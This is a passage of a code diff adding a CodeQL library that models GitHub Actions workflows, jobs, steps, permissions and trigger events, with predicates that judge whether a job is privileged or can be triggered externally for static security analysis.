getParentNode() { result.getNode() = value } + + override string getAPrimaryQlClass() { result = "ExpressionImpl" } + + override YamlNode getNode() { none() } + + string getExpression() { result = fullExpression } + + string getFullExpression() { result = fullExpression } + + string getRawExpression() { result = rawExpression } + + /** + * Gets the absolute coordinates of the expression. + */ + predicate expressionLocation(int sl, int sc, int el, int ec) { + exists(int lineDiff, string text, string style, Location loc | + text = value.getValue() and + loc = value.getLocation() and + lineDiff = loc.getEndLine() - loc.getStartLine() and + style = value.getStyle() + | + // eg: + // - run: echo "hello" + // - run: 'echo "hello"' + // - run: "echo 'hello'" + style = ["", "\"", "'"] and + lineDiff = 0 and + sl = loc.getStartLine() and + el = sl and + sc = loc.getStartColumn() + exprOffset and + ec = sc + rawExpression.length() - 1 + or + // eg: + // - run: "echo 'hello' + // echo 'hello'" + // - run: "echo 'hello' + // echo 'hello' + // echo 'hello'" + style = ["", "\"", "'"] and + lineDiff > 0 and + sl = loc.getStartLine() and + el = loc.getEndLine() and + sc = loc.getStartColumn() and + ec = loc.getEndColumn() + or + // eg: + // - run: | + // echo "hello" + // - run: | + // echo "hello" + // echo "bye" + style = "|" and + exists(int r | + ( + r > 0 and + partialLineLengthSum(text, r - 1) < exprOffset and + partialLineLengthSum(text, r) >= exprOffset and + sl = loc.getStartLine() + r + 1 and + el = sl and + sc = + key.getLocation().getStartColumn() + exprOffset - partialLineLengthSum(text, r - 1) + 2 - + 1 and + ec = sc + rawExpression.length() - 1 + or + r = 0 and + partialLineLengthSum(text, r) > exprOffset and + sl = loc.getStartLine() + r + 1 and + el = sl and + sc = key.getLocation().getStartColumn() + 2 + exprOffset and + ec = sc + rawExpression.length() - 1 + ) + ) + or + // eg: + // - run: > + // echo "hello" + // - run: > + // echo "hello" + // echo "hello" + 
style = ">" and + sl = loc.getStartLine() + 1 and + el = loc.getEndLine() and + sc = key.getLocation().getStartColumn() and + ec = loc.getEndColumn() + ) + } + + override Location getLocation() { + exists(Location loc | + this.hasLocationInfo(loc.getFile().getAbsolutePath(), loc.getStartLine(), + loc.getStartColumn(), loc.getEndLine(), loc.getEndColumn()) and + result = loc + ) + } + + predicate hasLocationInfo(string path, int sl, int sc, int el, int ec) { + path = value.getFile().getAbsolutePath() and + this.expressionLocation(sl, sc, el, ec) + } +} + +class CompositeActionImpl extends AstNodeImpl, TCompositeAction { + YamlMapping n; + + CompositeActionImpl() { this = TCompositeAction(n) } + + override string toString() { result = n.toString() } + + override AstNodeImpl getAChildNode() { result.getNode() = n.getAChildNode*() } + + override AstNodeImpl getParentNode() { none() } + + override string getAPrimaryQlClass() { result = "CompositeActionImpl" } + + override Location getLocation() { result = n.getLocation() } + + override YamlMapping getNode() { result = n } + + RunsImpl getRuns() { result.getNode() = n.lookup("runs") } + + OutputsImpl getOutputs() { result.getNode() = n.lookup("outputs") } + + ExpressionImpl getAnOutputExpr() { result = this.getOutputs().getAnOutputExpr() } + + ExpressionImpl getOutputExpr(string name) { result = this.getOutputs().getOutputExpr(name) } + + InputsImpl getInputs() { result.getNode() = n.lookup("inputs") } + + InputImpl getAnInput() { n.lookup("inputs").(YamlMapping).maps(result.getNode(), _) } + + InputImpl getInput(string name) { + n.lookup("inputs").(YamlMapping).maps(result.getNode(), _) and + result.getNode().getValue() = name + } + + LocalJobImpl getACallerJob() { result = this.getACallerStep().getEnclosingJob() } + + UsesStepImpl getACallerStep() { + exists(DataFlow::CallNode call | + call.getCalleeNode() = this and + result = call.getCfgNode().getAstNode() + ) + } + + string getResolvedPath() { + result = + ["", 
"./"] + + this.getLocation() + .getFile() + .getRelativePath() + .replaceAll(getRepoRoot(), "") + .replaceAll("/action.yml", "") + .replaceAll("/action.yaml", "") + .replaceAll(".github/actions/external/", "") + } + + private predicate hasExplicitSecretAccess() { + // the job accesses a secret other than GITHUB_TOKEN + exists(SecretsExpressionImpl expr | + expr.getEnclosingCompositeAction() = this and not expr.getFieldName() = "GITHUB_TOKEN" + ) + } + + private predicate hasExplicitWritePermission() { + // a calling job has an explicit write permission + this.getACallerJob().getPermissions().getAPermission().matches("%write") + } + + /** Holds if the action is privileged. */ + predicate isPrivileged() { + // there is a calling job that defines explicit write permissions + this.hasExplicitWritePermission() + or + // the actions has an explicit secret accesses + this.hasExplicitSecretAccess() + or + // there is a privileged caller job + ( + this.getACallerJob().isPrivileged() + or + not this.getACallerJob().isPrivileged() and + this.getACallerJob().getATriggerEvent().isPrivileged() + ) + } + + override EventImpl getATriggerEvent() { result = this.getACallerJob().getATriggerEvent() } +} + +class WorkflowImpl extends AstNodeImpl, TWorkflowNode { + YamlMapping n; + + WorkflowImpl() { this = TWorkflowNode(n) } + + override string toString() { result = n.toString() } + + override AstNodeImpl getAChildNode() { result.getNode() = n.getAChildNode*() } + + override AstNodeImpl getParentNode() { none() } + + override string getAPrimaryQlClass() { result = "WorkflowImpl" } + + override Location getLocation() { result = n.getLocation() } + + override YamlMapping getNode() { result = n } + + /** Gets the `on` trigger events for this workflow. */ + OnImpl getOn() { result.getNode() = n.lookup("on") } + + /** Gets the 'global' `env` mapping in this workflow. */ + EnvImpl getEnv() { result.getNode() = n.lookup("env") } + + /** Gets the name of the workflow. 
*/
+ string getName() { result = n.lookup("name").(YamlString).getValue() }
+
+ /** Gets the job within this workflow with the given job ID. */
+ JobImpl getJob(string jobId) { result.getEnclosingWorkflow() = this and result.getId() = jobId }
+
+ /** Gets a job within this workflow */
+ JobImpl getAJob() { result.getEnclosingWorkflow() = this }
+
+ /** Gets the permissions granted to this workflow. */
+ PermissionsImpl getPermissions() { result.getNode() = n.lookup("permissions") }
+
+ /** Gets the trigger event that starts this workflow. */
+ override EventImpl getATriggerEvent() { this.getOn().getAnEvent() = result }
+
+ /** Gets the strategy for this workflow. */
+ StrategyImpl getStrategy() { result.getNode() = n.lookup("strategy") }
+}
+
+class ReusableWorkflowImpl extends AstNodeImpl, WorkflowImpl {
+ YamlValue workflow_call;
+
+ ReusableWorkflowImpl() {
+ n.lookup("on").(YamlMappingLikeNode).getNode("workflow_call") = workflow_call
+ }
+
+ override AstNodeImpl getAChildNode() { result.getNode() = n.getAChildNode*() }
+
+ override EventImpl getATriggerEvent() {
+ // The trigger event for a reusable workflow is the trigger event of the caller workflow
+ this.getACaller().getEnclosingWorkflow().getOn().getAnEvent() = result
+ or
+ // or the trigger event of the workflow if it has any other than workflow_call
+ this.getOn().getAnEvent() = result and not result.getName() = "workflow_call"
+ }
+
+ OutputsImpl getOutputs() { result.getNode() = workflow_call.(YamlMapping).lookup("outputs") }
+
+ ExpressionImpl getAnOutputExpr() { result = this.getOutputs().getAnOutputExpr() }
+
+ ExpressionImpl getOutputExpr(string name) { result = this.getOutputs().getOutputExpr(name) }
+
+ InputsImpl getInputs() { result.getNode() = workflow_call.(YamlMapping).lookup("inputs") }
+
+ InputImpl getAnInput() {
+ workflow_call.(YamlMapping).lookup("inputs").(YamlMapping).maps(result.getNode(), _)
+ }
+
+ InputImpl getInput(string name) {
+
workflow_call.(YamlMapping).lookup("inputs").(YamlMapping).maps(result.getNode(), _) and + result.getNode().(YamlString).getValue() = name + } + + ExternalJobImpl getACaller() { + exists(DataFlow::CallNode call | + call.getCalleeNode() = this and + result = call.getCfgNode().getAstNode() + ) + } + + string getResolvedPath() { + result = + ["", "./"] + + this.getLocation() + .getFile() + .getRelativePath() + .replaceAll(getRepoRoot(), "") + .replaceAll(".github/workflows/external/", "") + } +} + +class InputsImpl extends AstNodeImpl, TInputsNode { + YamlMapping n; + + InputsImpl() { this = TInputsNode(n) } + + override string toString() { result = n.toString() } + + override AstNodeImpl getAChildNode() { result.getNode() = n.getAChildNode*() } + + //override AstNodeImpl getAChildNode() { result = this.getAnInput() } + override AstNodeImpl getParentNode() { result.getAChildNode() = this } + + override string getAPrimaryQlClass() { result = "InputsImpl" } + + override Location getLocation() { result = n.getLocation() } + + override YamlMapping getNode() { result = n } + + InputImpl getAnInput() { n.maps(result.getNode(), _) } + + InputImpl getInput(string name) { + n.maps(result.getNode(), _) and + result.getNode().(YamlString).getValue() = name + } +} + +class DefaultsImpl extends AstNodeImpl, TDefaultsNode { + YamlMapping n; + + DefaultsImpl() { this = TDefaultsNode(n) } + + override string toString() { result = n.toString() } + + override AstNodeImpl getAChildNode() { result.getNode() = n.getAChildNode*() } + + override AstNodeImpl getParentNode() { result.getAChildNode() = this } + + override string getAPrimaryQlClass() { result = "DefaultsImpl" } + + override Location getLocation() { result = n.getLocation() } + + override YamlMapping getNode() { result = n } + + ScalarValueImpl getValue(string name, string prop) { + n.lookup(name).(YamlMapping).lookup(prop) = result.getNode() + } +} + +class InputImpl extends AstNodeImpl, TInputNode { + YamlValue n; + + 
InputImpl() { this = TInputNode(n) }
+
+ override string toString() { result = n.toString() }
+
+ override AstNodeImpl getAChildNode() { result.getNode() = n.getAChildNode*() }
+
+ override InputsImpl getParentNode() { result.getAChildNode() = this }
+
+ override string getAPrimaryQlClass() { result = "InputImpl" }
+
+ override Location getLocation() { result = n.getLocation() }
+
+ override YamlScalar getNode() { result = n }
+}
+
+class OutputsImpl extends AstNodeImpl, TOutputsNode {
+ YamlMapping n;
+
+ OutputsImpl() { this = TOutputsNode(n) }
+
+ override string toString() { result = n.toString() }
+
+ override AstNodeImpl getAChildNode() { result.getNode() = n.getAChildNode*() }
+
+ override AstNodeImpl getParentNode() { result.getAChildNode() = this }
+
+ override string getAPrimaryQlClass() { result = "OutputsImpl" }
+
+ override Location getLocation() { result = n.getLocation() }
+
+ override YamlMapping getNode() { result = n }
+
+ /** Gets an output expression. */
+ ExpressionImpl getAnOutputExpr() { result = this.getOutputExpr(_) }
+
+ /** Gets a specific output expression by name.
*/ + ExpressionImpl getOutputExpr(string name) { + exists(YamlScalar l | + l = result.getParentNode().getNode() and + ( + n.lookup(name).(YamlMapping).lookup("value") = l or + n.lookup(name) = l + ) + ) + } + + string getAnOutputName() { n.maps(any(YamlString s | s.getValue() = result), _) } +} + +class PermissionsImpl extends AstNodeImpl, TPermissionsNode { + YamlMappingLikeNode n; + + PermissionsImpl() { this = TPermissionsNode(n) } + + override string toString() { result = n.toString() } + + override AstNodeImpl getAChildNode() { result.getNode() = n.getAChildNode*() } + + override AstNodeImpl getParentNode() { result.getAChildNode() = this } + + override string getAPrimaryQlClass() { result = "PermissionsImpl" } + + override Location getLocation() { result = n.getLocation() } + + override YamlMappingLikeNode getNode() { result = n } + + string getAScope() { + result = + [ + "actions", "attestations", "checks", "contents", "deployments", "discussions", "id-token", + "issues", "packages", "pages", "pull-requests", "repository-projects", "security-events", + "statuses" + ] + } + + string getAPermission() { + exists(YamlMapping mapping, string scope | + mapping = n and + result = scope + ": " + mapping.lookup(scope).(YamlScalar).getValue() + ) + or + exists(YamlScalar scalar | + scalar = n and + ( + scalar.getValue() = "write-all" and + result = this.getAScope() + ":write" + or + scalar.getValue() = "read-all" and + result = this.getAScope() + ":read" + ) + ) + } + + bindingset[perm] + string getPermission(string perm) { + exists(string p | + p = this.getAPermission() and p.matches(perm + ":%") and result = p.splitAt(":", 1).trim() + ) + } +} + +class StrategyImpl extends AstNodeImpl, TStrategyNode { + YamlMapping n; + + StrategyImpl() { this = TStrategyNode(n) } + + override string toString() { result = n.toString() } + + override AstNodeImpl getAChildNode() { result.getNode() = n.getAChildNode*() } + + override AstNodeImpl getParentNode() { result.getAChildNode() 
= this }
+
+ override string getAPrimaryQlClass() { result = "StrategyImpl" }
+
+ override Location getLocation() { result = n.getLocation() }
+
+ override YamlMapping getNode() { result = n }
+
+ YamlMapping getMatrix() { result = n.lookup("matrix") }
+
+ /** Gets a specific matrix expression (YamlMapping) by name. */
+ ExpressionImpl getMatrixVarExpr(string accessPath) {
+ exists(MatrixAccessPathImpl p, ScalarValueImpl v |
+ p.toString() = accessPath and
+ resolveMatrixAccessPath(n.lookup("matrix"), p).getNode(_) = v.getNode() and
+ result.getParentNode() = v
+ )
+ }
+
+ /** Gets a specific matric expression (YamlMapping) by name. */
+ ExpressionImpl getAMatrixVarExpr() {
+ n.lookup("matrix").(YamlMapping).lookup(_) = result.getNode()
+ }
+}
+
+class NeedsImpl extends AstNodeImpl, TNeedsNode {
+ YamlMappingLikeNode n;
+
+ NeedsImpl() { this = TNeedsNode(n) }
+
+ override string toString() { result = n.toString() }
+
+ override AstNodeImpl getAChildNode() { result.getNode() = n.getAChildNode*() }
+
+ override JobImpl getParentNode() { result.getNode().lookup("needs") = n }
+
+ override string getAPrimaryQlClass() { result = "NeedsImpl" }
+
+ override Location getLocation() { result = n.getLocation() }
+
+ override YamlMappingLikeNode getNode() { result = n }
+
+ /** Gets a job that needs to be run before the job defining these needs.
*/
+ JobImpl getANeededJob() {
+ result.getId() = n.getNode(_).(YamlString).getValue() and
+ result.getLocation().getFile() = n.getLocation().getFile()
+ }
+}
+
+class OnImpl extends AstNodeImpl, TOnNode {
+ YamlMappingLikeNode n;
+
+ OnImpl() { this = TOnNode(n) }
+
+ override string toString() { result = n.toString() }
+
+ override AstNodeImpl getAChildNode() { result.getNode() = n.getAChildNode*() }
+
+ override WorkflowImpl getParentNode() { result.getAChildNode() = this }
+
+ override string getAPrimaryQlClass() { result = "OnImpl" }
+
+ override Location getLocation() { result = n.getLocation() }
+
+ override YamlMappingLikeNode getNode() { result = n }
+
+ /** Gets an event that triggers the workflow. */
+ EventImpl getAnEvent() { result.getParentNode() = this }
+}
+
+class EventImpl extends AstNodeImpl, TEventNode {
+ YamlScalar e;
+ YamlMappingLikeNode n;
+
+ EventImpl() { this = TEventNode(e, n) }
+
+ override string toString() { result = e.getValue() }
+
+ override AstNodeImpl getAChildNode() { result.getNode() = n.getAChildNode*() }
+
+ override OnImpl getParentNode() { result.getAChildNode() = this }
+
+ override string getAPrimaryQlClass() { result = "EventImpl" }
+
+ override Location getLocation() { result = e.getLocation() }
+
+ override YamlScalar getNode() { result = e }
+
+ /** Gets the name of the event that triggers the workflow. */
+ string getName() { result = e.getValue() }
+
+ /** Gets the Yaml Node associated with the event if any */
+ YamlMappingLikeNode getValueNode() { result = n }
+
+ /** Gets an activity type */
+ string getAnActivityType() {
+ result =
+ n.(YamlMapping).lookup("types").(YamlMappingLikeNode).getNode(_).(YamlScalar).getValue()
+ }
+
+ /** Gets a string value for any property (eg: branches, branches-ignore, etc.)
*/ + string getAPropertyValue(string prop) { + result = n.(YamlMapping).lookup(prop).(YamlMappingLikeNode).getNode(_).(YamlScalar).getValue() + } + + /** Holds if the event has a property with the given name */ + predicate hasProperty(string prop) { exists(this.getAPropertyValue(prop)) } + + /** Holds if the event can be triggered by an external actor. */ + predicate isExternallyTriggerable() { + // the job is triggered by an event that can be triggered externally + // except for workflow_run which requires additional checks + externallyTriggerableEventsDataModel(this.getName()) and + not this.getName() = "workflow_run" + or + this.getName() = "workflow_run" and + // workflow_run cannot be externally triggered if the triggering workflow runs in the context of the default branch + // An attacker can change the triggering workflow from any event to `pull_request` to trigger the workflow + // in that case, the triggering workflow will run in the context of the PR head branch + not exists(this.getAPropertyValue("branches")) + or + // the event is `workflow_call` and there is a caller workflow that can be triggered externally + this.getName() = "workflow_call" and + ( + // there are hints that this workflow is meant to be called by external triggers + exists(ExpressionImpl expr, string external_trigger | + expr.getEnclosingWorkflow() = this.getEnclosingWorkflow() and + expr.getExpression().matches("%github.event" + external_trigger + "%") and + externallyTriggerableEventsDataModel(external_trigger) + ) + or + this.getEnclosingWorkflow() + .(ReusableWorkflowImpl) + .getACaller() + .getATriggerEvent() + .isExternallyTriggerable() + ) + } + + predicate isPrivileged() { + // the Job is triggered by an event other than `pull_request`, or `workflow_call` + not this.getName() = "pull_request" and + not this.getName() = "workflow_call" + or + // Reusable Workflow with a privileged caller or we cant find a caller + this.getName() = "workflow_call" and + ( + 
this.getEnclosingWorkflow().(ReusableWorkflowImpl).getACaller().isPrivileged() or + not exists(this.getEnclosingWorkflow().(ReusableWorkflowImpl).getACaller()) + ) + } +} + +class JobImpl extends AstNodeImpl, TJobNode { + YamlMapping n; + string jobId; + WorkflowImpl workflow; + + JobImpl() { + this = TJobNode(n) and + workflow.getNode().lookup("jobs").(YamlMapping).lookup(jobId) = n + } + + override string toString() { result = "Job: " + jobId } + + override AstNodeImpl getAChildNode() { result.getNode() = n.getAChildNode*() } + + override WorkflowImpl getParentNode() { result.getAChildNode() = this } + + override string getAPrimaryQlClass() { result = "JobImpl" } + + override Location getLocation() { result = n.getLocation() } + + override YamlMapping getNode() { result = n } + + /** Gets the ID of this job, as a string. */ + string getId() { result = jobId } + + /** Gets the workflow this job belongs to. */ + WorkflowImpl getWorkflow() { result = workflow } + + EnvImpl getEnv() { result.getNode() = n.lookup("env") } + + /** Gets a needed job. */ + JobImpl getANeededJob() { + exists(NeedsImpl needs | + needs.getParentNode() = this and + result = needs.getANeededJob() + ) + } + + /** Gets the declaration of the outputs for the job. */ + OutputsImpl getOutputs() { result.getNode() = n.lookup("outputs") } + + /** Gets a Job output expression. */ + ExpressionImpl getAnOutputExpr() { result = this.getOutputs().getAnOutputExpr() } + + /** Gets a Job output expression given its name. */ + ExpressionImpl getOutputExpr(string name) { result = this.getOutputs().getOutputExpr(name) } + + /** Gets the condition that must be satisfied for this job to run. */ + IfImpl getIf() { result.getNode() = n.lookup("if") } + + /** Gets the deployment environment to run the job on. */ + EnvironmentImpl getEnvironment() { result.getNode() = n.lookup("environment") } + + /** Gets the permissions for this job. 
*/
+ PermissionsImpl getPermissions() { result.getNode() = n.lookup("permissions") }
+
+ /** Gets the strategy for this job. */
+ StrategyImpl getStrategy() { result.getNode() = n.lookup("strategy") }
+
+ /** Gets the trigger event that starts this workflow. */
+ override EventImpl getATriggerEvent() {
+ if this.getEnclosingWorkflow() instanceof ReusableWorkflowImpl
+ then
+ result = this.getEnclosingWorkflow().(ReusableWorkflowImpl).getACaller().getATriggerEvent()
+ or
+ result = this.getEnclosingWorkflow().getATriggerEvent() and
+ not result.getName() = "workflow_call"
+ else result = this.getEnclosingWorkflow().getATriggerEvent()
+ }
+
+ /** Gets the runs-on field of the job. */
+ string getARunsOnLabel() {
+ exists(ScalarValueImpl lbl, YamlMappingLikeNode runson |
+ runson = n.lookup("runs-on").(YamlMappingLikeNode)
+ |
+ (
+ lbl.getNode() = runson.getNode(_) and
+ not lbl.getNode() = runson.getNode("group")
+ or
+ lbl.getNode() = runson.getNode("labels").(YamlMappingLikeNode).getNode(_)
+ ) and
+ (
+ not exists(MatrixExpressionImpl e | e.getParentNode() = lbl) and
+ result =
+ lbl.getValue()
+ .trim()
+ .regexpReplaceAll("^('|\")", "")
+ .regexpReplaceAll("('|\")$", "")
+ .trim()
+ or
+ exists(MatrixExpressionImpl e |
+ e.getParentNode() = lbl and
+ result = e.getLiteralValues()
+ )
+ )
+ )
+ }
+
+ private predicate hasExplicitSecretAccess() {
+ // the job accesses a secret other than GITHUB_TOKEN
+ exists(SecretsExpressionImpl expr |
+ (expr.getEnclosingJob() = this or not exists(expr.getEnclosingJob())) and
+ expr.getEnclosingWorkflow() = this.getEnclosingWorkflow() and
+ not expr.getFieldName() = "GITHUB_TOKEN"
+ )
+ }
+
+ private predicate hasExplicitNonePermission() {
+ exists(this.getPermissions()) and not exists(this.getPermissions().getAPermission())
+ }
+
+ private predicate hasExplicitReadPermission() {
+ // the job has not an explicit write permission
+ exists(this.getPermissions().getAPermission()) and
+ not
this.getPermissions().getAPermission().matches("%write")
+ }
+
+ private predicate hasExplicitWritePermission() {
+ // the job has an explicit write permission
+ this.getPermissions().getAPermission().matches("%write")
+ }
+
+ private predicate hasImplicitNonePermission() {
+ not exists(this.getPermissions()) and
+ exists(this.getEnclosingWorkflow().getPermissions()) and
+ not exists(this.getEnclosingWorkflow().getPermissions().getAPermission())
+ or
+ not exists(this.getPermissions()) and
+ not exists(this.getEnclosingWorkflow().getPermissions()) and
+ exists(this.getEnclosingWorkflow().(ReusableWorkflowImpl).getACaller().getPermissions()) and
+ not exists(
+ this.getEnclosingWorkflow()
+ .(ReusableWorkflowImpl)
+ .getACaller()
+ .getPermissions()
+ .getAPermission()
+ )
+ }
+
+ private predicate hasImplicitReadPermission() {
+ // the job has not an explicit write permission
+ not exists(this.getPermissions()) and
+ exists(this.getEnclosingWorkflow().getPermissions().getAPermission()) and
+ not this.getEnclosingWorkflow().getPermissions().getAPermission().matches("%write")
+ or
+ not exists(this.getPermissions()) and
+ not exists(this.getEnclosingWorkflow().getPermissions()) and
+ this.getEnclosingWorkflow()
+ .(ReusableWorkflowImpl)
+ .getACaller()
+ .getPermissions()
+ .getAPermission()
+ .matches("%read")
+ }
+
+ private predicate hasImplicitWritePermission() {
+ // the job has an explicit write permission
+ not exists(this.getPermissions()) and
+ this.getEnclosingWorkflow().getPermissions().getAPermission().matches("%write")
+ or
+ not exists(this.getPermissions()) and
+ not exists(this.getEnclosingWorkflow().getPermissions()) and
+ this.getEnclosingWorkflow()
+ .(ReusableWorkflowImpl)
+ .getACaller()
+ .getPermissions()
+ .getAPermission()
+ .matches("%write")
+ }
+
+ private predicate hasRuntimeData() {
+ exists(string path, string trigger, string name, string secrets_source, string perms |
+ workflowDataModel(path, trigger, name, secrets_source, perms, _)
and + path.trim() = this.getLocation().getFile().getRelativePath() and + name.trim().matches(this.getId() + "%") + ) + } + + private predicate hasRuntimeWritePermissions() { + // the effective runtime permissions have write access + exists(string path, string trigger, string name, string secrets_source, string perms | + workflowDataModel(path, trigger, name, secrets_source, perms, _) and + path.trim() = this.getLocation().getFile().getRelativePath() and + name.trim().matches(this.getId() + "%") and + // We cannot trust the permissions for pull_request events since they depend on the + // provenance of the head branch (local vs fork) + not trigger.trim() = "pull_request" and + perms.toLowerCase().matches("%write%") + ) + } + + /** Holds if the job is privileged. */ + predicate isPrivileged() { + // the job has privileged runtime permissions + this.hasRuntimeWritePermissions() + or + // the job has an explicit secret accesses + this.hasExplicitSecretAccess() + or + // the job has an explicit write permission + this.hasExplicitWritePermission() + or + // the job has no explicit permissions but the workflow has write permissions + not exists(this.getPermissions()) and + this.hasImplicitWritePermission() + } + + /** Holds if the action is privileged and externally triggerable. 
*/
+ predicate isPrivilegedExternallyTriggerable(EventImpl event) {
+ this.getATriggerEvent() = event and
+ // job is triggereable by an external user
+ event.isExternallyTriggerable() and
+ // no matter if `pull_request` is granted write permissions or access to secrets
+ // when the job is triggered by a `pull_request` event from a fork, they will get revoked
+ not event.getName() = "pull_request" and
+ (
+ // job is privileged (write access or access to secrets)
+ this.isPrivileged()
+ or
+ // the trigger event is __normally__ privileged
+ event.isPrivileged() and
+ // and we have no runtime data to prove otherwise
+ not this.hasRuntimeData() and
+ // and the job is not explicitly non-privileged
+ not (
+ (
+ this.hasExplicitNonePermission() or
+ this.hasImplicitNonePermission() or
+ this.hasExplicitReadPermission() or
+ this.hasImplicitReadPermission()
+ ) and
+ not this.hasExplicitSecretAccess()
+ )
+ )
+ }
+}
+
+abstract class StepsContainerImpl extends AstNodeImpl {
+ /** Gets any steps that are defined within this job. */
+ abstract StepImpl getAStep();
+
+ /** Gets the step at the given index within this job. */
+ abstract StepImpl getStep(int i);
+}
+
+class RunsImpl extends StepsContainerImpl, TRunsNode {
+ YamlMapping n;
+
+ RunsImpl() { this = TRunsNode(n) }
+
+ override string toString() { result = n.toString() }
+
+ override AstNodeImpl getAChildNode() { result.getNode() = n.getAChildNode*() }
+
+ override CompositeActionImpl getParentNode() { result.getAChildNode() = this }
+
+ override string getAPrimaryQlClass() { result = "RunsImpl" }
+
+ override Location getLocation() { result = n.getLocation() }
+
+ override YamlMapping getNode() { result = n }
+
+ /** Gets the action that this `runs` mapping is in. */
+ CompositeActionImpl getAction() { result = this.getParentNode() }
+
+ /** Gets any steps that are defined within this job.
*/
+ override StepImpl getAStep() {
+ result.getNode() = n.lookup("steps").(YamlSequence).getElementNode(_)
+ }
+
+ /** Gets the step at the given index within this job. */
+ override StepImpl getStep(int i) {
+ result.getNode() = n.lookup("steps").(YamlSequence).getElementNode(i)
+ }
+}
+
+class LocalJobImpl extends JobImpl, StepsContainerImpl {
+ LocalJobImpl() { n.maps(any(YamlString s | s.getValue() = "steps"), _) }
+
+ /** Gets any steps that are defined within this job. */
+ override StepImpl getAStep() {
+ result.getNode() = n.lookup("steps").(YamlSequence).getElementNode(_)
+ }
+
+ /** Gets the step at the given index within this job. */
+ override StepImpl getStep(int i) {
+ result.getNode() = n.lookup("steps").(YamlSequence).getElementNode(i)
+ }
+}
+
+class StepImpl extends AstNodeImpl, TStepNode {
+ YamlMapping n;
+
+ StepImpl() { this = TStepNode(n) }
+
+ override string toString() { result = n.toString() }
+
+ override AstNodeImpl getAChildNode() { result.getNode() = n.getAChildNode*() }
+
+ override AstNodeImpl getParentNode() {
+ result.getAChildNode() = this and
+ (result instanceof LocalJobImpl or result instanceof RunsImpl)
+ }
+
+ override string getAPrimaryQlClass() { result = "StepImpl" }
+
+ override Location getLocation() { result = n.getLocation() }
+
+ override YamlMapping getNode() { result = n }
+
+ override JobImpl getEnclosingJob() {
+ // if a step is within a composite action, we should follow the caller job
+ result = this.getEnclosingCompositeAction().getACallerJob() or
+ result = super.getEnclosingJob()
+ }
+
+ override EventImpl getATriggerEvent() { result = this.getEnclosingJob().getATriggerEvent() }
+
+ EnvImpl getEnv() { result.getNode() = n.lookup("env") }
+
+ /** Gets the ID of this step, if any. */
+ string getId() { result = n.lookup("id").(YamlString).getValue() }
+
+ /** Gets the value of the `if` field in this step, if any.
*/ + IfImpl getIf() { result.getNode() = n.lookup("if") } + + /** Gets the Runs or LocalJob that this step is in. */ + StepsContainerImpl getContainer() { + result = this.getParentNode().(RunsImpl) or + result = this.getParentNode().(LocalJobImpl) + } + + StepImpl getNextStep() { + // if step is a uses step calling a local composite action, we should follow the called step + this instanceof UsesStepImpl and + exists(CompositeActionImpl a | + a.getACallerStep() = this and + result = a.getRuns().getStep(0) + ) + or + // if step is the last step in a composite action, we should follow the next step in the caller + exists(RunsImpl runs, StepsContainerImpl caller_container, StepImpl caller, int i | + this.getContainer() = runs and + runs.getStep(count(StepImpl s | runs.getAStep() = s | s) - 1) = this and + runs.getEnclosingCompositeAction().getACallerStep() = caller and + caller.getContainer() = caller_container and + caller_container.getStep(i) = caller and + caller_container.getStep(i + 1) = result + ) + or + // next step in the same job/runs + exists(int i | + this.getContainer().getStep(i) = this and + result = this.getContainer().getStep(i + 1) + ) + } + + /** Gets a step that follows this step. 
*/
+ StepImpl getAFollowingStep() {
+ (
+ // next steps in the same job/runs
+ exists(int i, int j |
+ this.getContainer().getStep(i) = this and
+ result = this.getContainer().getStep(j) and
+ i < j
+ )
+ or
+ // next steps of the caller (in a composite action step)
+ result = this.getEnclosingCompositeAction().getACallerStep().getAFollowingStep()
+ or
+ // if any of the next steps is a call to a local composite actions, we should follow it
+ exists(int i, int j, CompositeActionImpl a |
+ this.getContainer().getStep(i) = this and
+ this.getContainer().getStep(j) = a.getACallerStep() and
+ i < j and
+ result = a.getRuns().getAStep()
+ )
+ )
+ }
+}
+
+class EnvironmentImpl extends AstNodeImpl, TEnvironmentNode {
+ YamlValue n;
+
+ EnvironmentImpl() { this = TEnvironmentNode(n) }
+
+ override string toString() { result = n.toString() }
+
+ override AstNodeImpl getAChildNode() { result.getNode() = n.getAChildNode*() }
+
+ override AstNodeImpl getParentNode() { result.getAChildNode() = this }
+
+ override string getAPrimaryQlClass() { result = "EnvironmentImpl" }
+
+ override Location getLocation() { result = n.getLocation() }
+
+ override YamlScalar getNode() { result = n }
+
+ /** Gets the environment name. */
+ string getName() { result = n.(YamlScalar).getValue() }
+
+ /** Gets the environmen name. */
+ ExpressionImpl getNameExpr() { result.getParentNode().getNode() = n }
+}
+
+class IfImpl extends AstNodeImpl, TIfNode {
+ YamlValue n;
+
+ IfImpl() { this = TIfNode(n) }
+
+ override string toString() { result = n.toString() }
+
+ override AstNodeImpl getAChildNode() { result.getNode() = n.getAChildNode*() }
+
+ override AstNodeImpl getParentNode() { result.getAChildNode() = this }
+
+ override string getAPrimaryQlClass() { result = "IfImpl" }
+
+ override Location getLocation() { result = n.getLocation() }
+
+ override YamlScalar getNode() { result = n }
+
+ /** Gets the condition that must be satisfied for this job to run.
*/
+ string getCondition() { result = n.(YamlScalar).getValue() }
+
+ /** Gets the condition that must be satisfied for this job to run. */
+ ExpressionImpl getConditionExpr() { result.getParentNode().getNode() = n }
+
+ /** Get condition scalar style. */
+ string getConditionStyle() { result = n.(YamlScalar).getStyle() }
+}
+
+class EnvImpl extends AstNodeImpl, TEnvNode {
+ YamlMapping n;
+
+ EnvImpl() { this = TEnvNode(n) }
+
+ override string toString() { result = n.toString() }
+
+ override AstNodeImpl getAChildNode() { result.getNode() = n.getAChildNode*() }
+
+ override AstNodeImpl getParentNode() {
+ result.(JobImpl).getEnv() = this or
+ result.(StepImpl).getEnv() = this or
+ result.(WorkflowImpl).getEnv() = this
+ }
+
+ override string getAPrimaryQlClass() { result = "EnvImpl" }
+
+ override Location getLocation() { result = n.getLocation() }
+
+ override YamlMapping getNode() { result = n }
+
+ /** Gets an environment variable value given its name. */
+ ScalarValueImpl getEnvVarValue(string name) { n.lookup(name) = result.getNode() }
+
+ /** Gets an environment variable value. */
+ ScalarValueImpl getAnEnvVarValue() { n.lookup(_) = result.getNode() }
+
+ /** Gets an environment variable expressin given its name. */
+ ExpressionImpl getEnvVarExpr(string name) { n.lookup(name) = result.getParentNode().getNode() }
+
+ /** Gets an environment variable expression. */
+ ExpressionImpl getAnEnvVarExpr() { n.lookup(_) = result.getParentNode().getNode() }
+}
+
+abstract class UsesImpl extends AstNodeImpl {
+ abstract string getCallee();
+
+ abstract ScalarValueImpl getCalleeNode();
+
+ abstract string getVersion();
+
+ int getMajorVersion() {
